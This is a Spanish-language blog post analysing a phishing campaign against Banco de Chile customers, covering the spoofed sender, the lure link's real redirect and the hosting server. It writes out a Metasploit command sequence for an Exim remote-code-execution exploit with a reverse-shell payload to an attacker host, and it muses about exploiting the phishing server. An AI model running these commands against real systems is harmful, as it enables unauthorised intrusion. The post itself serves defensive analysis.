RSS

Phishing - Banco de Chile

viernes, 13 de enero de 2012

Hace varios días que estoy recibiendo en mi casilla SPAM de pramirezh@gmail.com, una serie de correo electrónicos, el primero me indican en el asunto “Nueva Sincronizacion Por Mantenimiento”, y el último que me llegó dice “Ultimo aviso de Sincronizacion”, “Notese la falta ortográfica de los mensajes… como ya se podrán imaginar, es una campaña de phishing orientada a este banco, la cual me di el tiempo de analizar y ver como trabaja este o esta organización de phishers.

El origen:
Lo primero que se puede rescatar, es la técnica de suplantación de identidad, la cual se ve de la siguiente manera en el correo electrónico.



Si se dan cuenta, viene desde el origen b1.wweb.com.br, al cual si le realizamos un scan de puertos, nos encontramos con


Como se puede observar, existe el puerto 25, con el servidor Exim smtpd, versión 4.69, la cual es vulnerable a ejecución remota de código, y el exploit está disponible en nuestro buen amigo metasploit, la sentencia de explotación, y la cual tiene que haber seguido el atacante, para poder enviar correos electrónicos con otra identidad, es la siguiente:

msf>use exploit/unix/smtp/exim4_string_format

msf exploit(exim4_string_format) >set RHOST IP_SERVER_AFECTADO

msf exploit(exim4_string_format) >set PAYLOAD cmd/unix/reverse_perl

msf exploit(exim4_string_format) >set LHOST IP_HOST_ATACANTE

msf exploit(exim4_string_format) >exploit

 

Todas las opciones del exploit con:

msf exploit(exim4_string_format) >show options

 

 

Como ya sabemos, desde donde se envió el correo, y como falsificaron la identidad del banco, nos vamos al cuerpo del mensaje

 

Cuerpo:

Se ve algo así en la mayorías de los clientes SMTP:


 

Si bien es cierto, en Gmail está el cartel rojo que indica que puede ser un correo falsificado, en otros sistemas antispam o clientes SMTP no está presente, lo cual tiene un mayor grado de efectividad.

 

El link se ve bastante fidedigno a ojos de usuarios que no tienen mucha experiencia con este tipo de ataques (https://www.bancochile.cl/bchile-perfilamiento/), pero que pasa en el código fuente de este correo:

 


 
Claramente el href enviar al usuario a http://cl2013.sytes.net, este dominio está alojado en un servicio de www.NO-IP.com, y esta siendo utilizado para redireccionar a los usuarios a http://207.201.113.192, el cual contiene el aplicativo de phishing, como lo pueden observamos en la siguiente imagen.


Ahora tratamos de ver que servicios existen en esa dirección IP y donde está ubicada.




Versión de MySQL no actualizada ¿?   :-p, quizás por ahí toma el control del sitio para subir la aplicación de phishing… o quizás http://www.cvedetails.com/cve/CVE-2007-1742/ ¡!! Esto no es un rooter… solo un análisis de funcionamiento… en otra oportunidad será J

Ahora la IP, de donde es ¿?



Nada extraño… me hubiese llamado mucho la atención que estuviera alojado en Chile… le hubiese dedicado un par de horas más…

Veamos que dice un WAS




Definitivamente es explotable J

En resumen, después de esta análisis (bastante básico… y espero que no sea el último y mejorados), el phisher se movió de host, al parecer tienen que tener algún sistema de monitoreo, IPS o algo por el estilo, o quizás yo sea el paranoico y simplemente se cambio por que lo detectaron…

Para la próxima hacemos un rooter de phishing Chilensis… 


Welcome

Con la tecnología de Blogger.